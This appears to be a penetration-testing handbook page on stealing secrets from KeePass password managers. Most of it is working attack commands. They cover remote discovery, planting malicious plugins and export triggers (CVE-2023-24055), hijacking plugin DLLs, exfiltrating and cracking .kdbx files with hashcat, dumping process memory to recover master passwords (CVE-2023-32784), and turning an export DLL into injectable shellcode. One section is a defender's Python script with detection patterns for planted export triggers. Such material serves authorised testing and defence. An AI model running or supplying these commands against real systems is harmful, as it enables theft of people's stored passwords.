KeePass

MITRE ATT&CK™ Credentials from Password Stores: Password Managers - Technique T1555.005

Last updated 5 months ago

Theory

Password managers generate and securely store passwords of various services, safeguarding them under a single master password. This master password serves as the key to access all the stored passwords within the password manager.

Examples of Password Manager applications:

  • Built-in password managers (Windows)
  • Third-party: KeePass, 1Password, LastPass

However, misconfigurations and security flaws in these applications can let us access the stored data. Various tools can be used during the enumeration stage to collect sensitive data from the password managers used by web browsers and desktop applications.

Practice

Enumeration

KeePwn (Python) can be used to remotely identify hosts that run KeePass in a target environment.

# Search by files
python3 KeePwn.py search -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -tf ./targets.txt

# Search by processes + csv output
python3 KeePwn.py search -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -tf ./targets.txt --threads 4 --get-process --found-only --output keepwn_out.csv

NetExec (Python) can also be used to remotely check whether KeePass is installed in the target environment.

nxc smb <TARGETS> -u <ADMIN_ACCOUNT> -p <PASSWORD> -M keepass_discover

KeePass Plugin Abuse

These actions are performed through SMB C$ share access, which limits AV/EDR detection as no command execution takes place on the target.

# List currently installed plugins and enumerate the plugin cache
python3 KeePwn.py plugin check -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>

# Add and remove a malicious plugin which performs a cleartext export of the database in %APPDATA% on next KeePass launch
python3 KeePwn.py plugin add -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>

# Poll %APPDATA% for exports and automatically move them from the remote host to the local filesystem
python3 KeePwn.py plugin poll -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>

Export the database using a malicious plugin:

# Package the plugin project as a .plgx, then drop it into the global Plugins directory (picked up on next KeePass launch)
KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"

Export the database by hijacking a legitimate plugin DLL (requires an existing plugin already in use):

# Build the plugin, then overwrite the legitimate plugin's DLL in the user's PluginCache
copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
devenv /build Release KeeFarceRebornPlugin.sln
copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll

KeePass Trigger Abuse - CVE-2023-24055

We can modify the KeePass.config.xml file to create malicious triggers that automatically export database entries to accessible locations.

# Recon
nxc smb <TARGET> -u <ADMIN_ACCOUNT> -p <PASSWORD> -M keepass_discover

# Exploit
nxc smb <TARGET> -u <ADMIN_ACCOUNT> -p <PASSWORD> -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"

If the configuration file is not in the default location, specify it with the --config-path argument.

# Check if a malicious trigger named "export" is currently written in the KeePass configuration
python3 KeePwn.py trigger check -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>

# Add and remove a malicious trigger named "export" which performs a cleartext export of the database in %APPDATA% on next KeePass launch
python3 KeePwn.py trigger add -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>

# Poll %APPDATA% for exports and automatically move them from the remote host to the local filesystem
python3 KeePwn.py trigger poll -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
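As an added defender-side example (not part of the original page, KeePwn or NetExec), the following Python script parses a KeePass.config.xml and flags triggers that look like the cleartext-export trigger the modules above write: a trigger named "export", or any action whose parameters reference an export format or a user-writable drop path. The sample configuration and every GUID in it are constructed placeholders, not real KeePass identifiers.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample KeePass.config.xml (the per-user copy lives under %APPDATA%\KeePass).
# Trigger 1 is benign; trigger 2 has the shape of the "export" trigger that the
# KeePwn/NetExec modules write: an action that dumps the open database as cleartext XML.
# All GUIDs are placeholders, not real KeePass event/action identifiers.
SAMPLE_CONFIG = """<Configuration><Application><TriggerSystem><Triggers>
<Trigger><Guid>PLACEHOLDER-GUID-1</Guid><Name>Lock on idle</Name>
 <Actions><Action><TypeGuid>PLACEHOLDER-LOCK</TypeGuid><Parameters/></Action></Actions></Trigger>
<Trigger><Guid>PLACEHOLDER-GUID-2</Guid><Name>export</Name>
 <Actions><Action><TypeGuid>PLACEHOLDER-EXPORT</TypeGuid><Parameters>
  <Parameter>%APPDATA%\\export.xml</Parameter><Parameter>KeePass XML (2.x)</Parameter>
 </Parameters></Action></Actions></Trigger>
</Triggers></TriggerSystem></Application></Configuration>"""

# Indicators worth flagging in a trigger's action parameters.
EXPORT_FORMAT_RE = re.compile(r"KeePass (XML|CSV)|\.(xml|csv|txt)$", re.IGNORECASE)
DROP_PATH_RE = re.compile(r"%APPDATA%|%TEMP%|%PUBLIC%|\\\\[^\\]+\\", re.IGNORECASE)
SUSPICIOUS_NAMES = {"export"}  # default trigger name used by the KeePwn/NetExec modules


def audit_triggers(config_xml: str) -> list:
    """Return one finding per trigger whose actions look like a cleartext export."""
    root = ET.fromstring(config_xml)
    findings = []
    for trig in root.iter("Trigger"):
        name = (trig.findtext("Name") or "").strip()
        params = [(p.text or "").strip() for p in trig.iter("Parameter")]
        reasons = []
        if name.lower() in SUSPICIOUS_NAMES:
            reasons.append("trigger name matches tooling default")
        if any(EXPORT_FORMAT_RE.search(p) for p in params):
            reasons.append("action references a cleartext export format or file")
        if any(DROP_PATH_RE.search(p) for p in params):
            reasons.append("action writes to a user-writable or UNC path")
        if reasons:
            findings.append({"name": name, "guid": trig.findtext("Guid"),
                             "parameters": params, "reasons": reasons})
    return findings


def audit_file(path: str) -> list:
    """Audit a KeePass.config.xml on disk (e.g. a copy collected from an endpoint)."""
    with open(path, encoding="utf-8") as fh:
        return audit_triggers(fh.read())


if __name__ == "__main__":
    for f in audit_triggers(SAMPLE_CONFIG):
        print(f"[!] trigger {f['name']!r} ({f['guid']}): " + "; ".join(f["reasons"]))
```

A hit on a trigger named "export" means the trigger is still armed, so the export file it names is worth looking for under the user's %APPDATA% as well.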

Cracking KDBX Database Master Password

Cracking Master Password - Manually

If we gain access to the KeePass database file, we may be able to exfiltrate it and crack the master password.

The KeePass database is stored as a .kdbx file; we can search for such files using the following commands:

#PowerShell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

#Cmd
dir /s /b C:\*.kdbx

Once the .kdbx file has been exfiltrated, convert it to a crackable hash with keepass2john and crack it with hashcat (mode 13400):

keepass2john keepass.kdbx > keepass.hash
hashcat -a 0 -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt --user

With the master password recovered, the database can be opened with kpcli to dump its entries:

$ kpcli --kdb=db.kdbx
Provide the master password: *************************
kpcli:/> dir
=== Groups ===
Database/

kpcli:/> cd Database
kpcli:/Database> dir
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Sample Entry                                               keepass.info
1. Sample Entry #2                          keepass.info/help/kb/testform.
2. User Company Password

kpcli:/Database> show -f 0
Title: Sample Entry
Uname: User Name
 Pass: Password
  URL: https://keepass.info/
Notes: Notes

Cracking Master Password - NetExec

NetExec (Python) can be used to remotely check whether KeePass is installed on the target computer, then steal the master password and decrypt the database.

nxc smb <TARGETS> -u <ADMIN_ACCOUNT> -p <PASSWORD> -M keepass_discover

Extract Passphrase from Memory - CVE-2023-32784

First, perform a process dump of the running KeePass process:

Get-Process keepass
# 988 is the PID reported by Get-Process; -ma writes a full memory dump
.\procdump.exe -accepteula -ma 988 KeePass.DMP

Retrieve the process dump as well as the .kdbx file containing the encrypted database (e.g. through SMB), then search the dump for master password candidates and brute-force the missing first character against the database:

python3 KeePwn.py parse_dump -d <dump_file> --bruteforce <database_file>

KeePassXC is also subject to such exploits.

First, perform a process dump of the running KeePassXC process:

Get-Process keepassxc
# 988 is the PID reported by Get-Process; -ma writes a full memory dump
.\procdump.exe -accepteula -ma 988 KeePassXC.DMP

Retrieve the process dump as well as the .kdbx file containing the encrypted database (e.g. through SMB), then extract composite key candidates from the dump:

python3 pass_the_key.py <dump_file> <database_file>

KeePass DLL Injection

Convert the compiled KeeFarceReborn DLL to shellcode with Donut, then inject it into the KeePass process with any injection technique:

donut "KeeFarceReborn.dll" -c KeeFarceReborn.Program -m Main -e 1

Post-injection steps

Once the injection is performed, you will see debug messages printed in a MessageBox (which should obviously be removed when used in a real penetration testing scenario). The exported database can then be found in the current user's %APPDATA% (chosen by default, as KeePass is sure to have write access there). The exported XML file can later be imported into any KeePass database without being asked for a password.

Notes

Enumeration & Plugin Abuse

KeePass features a plugin framework which can be abused to load malicious DLLs into the KeePass process, allowing attackers with administrator rights to easily export the database (see: KeeFarceRebornPlugin).

KeePwn (Python) can be used to abuse this KeePass plugin feature, exporting the database in cleartext.

By compiling the KeeFarceRebornPlugin project and copying the DLL into the plugins directory (located at the KeePass root, namely "C:\Program Files\KeePass Password Safe 2\Plugins" for a global install), we can abuse the KeePass plugin system.

Trigger Abuse

This KeePass Trigger Abuse, identified as CVE-2023-24055, only affects KeePass versions 2.53 and earlier.

NetExec (Python) can be used to remotely check whether KeePass is installed on the target computer, then steal the master password through a KeePass trigger and decrypt the database.

KeePwn (Python) can also be used to remotely abuse KeePass triggers in order to export the database in cleartext.

Cracking the Master Password

Once we exfiltrate the database to our attacking computer, we can start by using keepass2john and save its output as a crackable hash.

Then, we may crack the master password using hashcat. See the password cracking page of this book for more details about cracking passwords.

Now, we can open the database using kpcli and dump passwords.

Extracting the Passphrase from Memory

As described by @vdohney, it is possible to retrieve the database's master password from memory.

This KeePass abuse, identified as CVE-2023-32784, only affects KeePass versions prior to 2.54.

KeePwn (Python) can then be used to search for potential master password candidates in dumps. Because the resulting strings will (by design) be incomplete, the module can also be used to brute-force the missing first character against a specified KDBX file.

KeePass-the-Hash can then be used to search for composite key-like strings in a KeePassXC process dump.

DLL Injection

KeeFarceReborn is a standalone DLL that exports databases in cleartext once injected into the KeePass process.

After compiling the DLL, we may use Donut to convert it to shellcode and use it with any injection technique.

Resources

  • Credentials from Password Stores: Password Managers, Sub-technique T1555.005 - Enterprise | MITRE ATT&CK®
  • GitHub - Orange-Cyberdefense/KeePwn: A python tool to automate KeePass discovery and secret extraction.
  • KeePass | Pentester's Promiscuous Notebook